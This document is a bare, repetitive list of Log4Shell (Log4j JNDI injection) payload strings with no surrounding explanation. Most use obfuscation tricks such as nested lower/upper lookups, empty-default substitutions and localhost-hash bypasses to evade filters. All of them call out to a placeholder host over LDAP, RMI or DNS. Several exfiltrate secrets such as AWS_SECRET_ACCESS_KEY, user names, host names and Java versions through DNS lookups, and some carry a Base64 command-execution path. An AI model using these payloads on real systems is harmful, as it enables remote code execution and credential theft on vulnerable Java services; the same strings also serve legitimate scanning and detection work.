${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${hostName}.yoursite.com/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${jndi:dns://yoursite.com:80/}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:rmi://yoursite.com},
${jndi:ldap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jndi:rmi://yoursite.com},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:ldap://yoursite.com/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${env:user}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:dns://${hostName}.yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:dns://${hostName}.yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${jndi:rmi://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${date:'j'}ndi:dns://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://${hostName}.yoursite.com/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${jndi:ldap://${hostName}.yoursite.com/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:dns://yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${jndi:ldap://${env:USER}.yoursite.com/}
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
